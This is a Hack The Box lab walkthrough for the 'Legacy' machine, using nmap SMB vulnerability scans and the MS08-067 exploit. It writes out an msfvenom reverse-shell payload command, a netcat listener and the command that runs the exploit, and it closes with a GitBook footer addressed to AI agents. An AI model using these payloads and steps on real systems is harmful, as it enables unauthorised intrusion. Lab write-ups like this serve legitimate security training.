> For the complete documentation index, see [llms.txt](https://4st1nus.gitbook.io/hackthebox/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4st1nus.gitbook.io/hackthebox/hack-the-box-legacy-walkthrough-without-metasploit.md). # Hack The Box - Legacy Walkthrough without Metasploit ![Legacy](/files/-MP8vf-zNPaK0WLY8g56) ## Enumeration We start using nmap to enumerate the box with the following flags: -sC Script scan, equivalent to --script=default -sV Service version info -A Enable OS detection, version detection, script scanning, and traceroute ``` nmap -sC -sV -A 10.10.10.4 ``` ![Legacy enumeration](/files/-MPAT9veiSFXsYLWS-gD) We have SMB port 445 open so we can run nmap againg with vulnerability script on that port, the OS part will be useful later. ``` nmap --script smb-vuln* -p445 10.10.10.4 ``` Since there are multiple smb-vuln scripts, with the last **\*** we will run them all on port 445 of our victim box. ![WannaCry Vulnerability](/files/-MPARP3l4kXZ8UBV3xRe) It is vulnerable to CVE-2008-4250 (MS08-067) which affects the systems that have highest chances to be running in our victim. ### Finding the PoC With a quick google search we can find this github repository: #### It's a great resource that will let us place there our msfvenom payload and execute it in order to exploit the vulnerability. ### Modifying the PoC This will generate a reverse tcp for a 32 bits Windows, excluding the characters indicated with the -b flag. ``` msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows ``` ![PoC](/files/-MPAfJi9wyvOMc2P8sEr) This part of the exploit is the one that we will change with our own msfvenom payload. ### Executing the PoC First we should have a netcat listening already set in order to catch the reverse tcp shell. ``` nc -nvlp 443 ``` ![Netcat Listener](/files/-MPAxtQ5LoIJSCaf7Og3) We might run into this problem while trying to execute the exploit: ![Missing libriaries](/files/-MPAhKrJAuGAOVi3bVAQ) In order to fix it we just need to install **Impacket** and **PyCrypto.** For Impacket: ``` git clone https://github.com/SecureAuthCorp/impacket cd impacket pip install . ``` For PyCrypto: ``` pip install pycrypto ``` Once we have that fixed we can just execute it with the arguments needed. ![Payload Options](/files/-MPAxIaxvJlrTRSTiB7M) According with our previous enumeration we had high chances for this box to be Windows XP SP3, so we tested with option 6. ``` python ms08_067_2018.py 10.10.10.4 6 445 ``` ## Pwnd ![Own the box](/files/-MPAwheaQ45U3I5TJfbc) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://4st1nus.gitbook.io/hackthebox/hack-the-box-legacy-walkthrough-without-metasploit.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.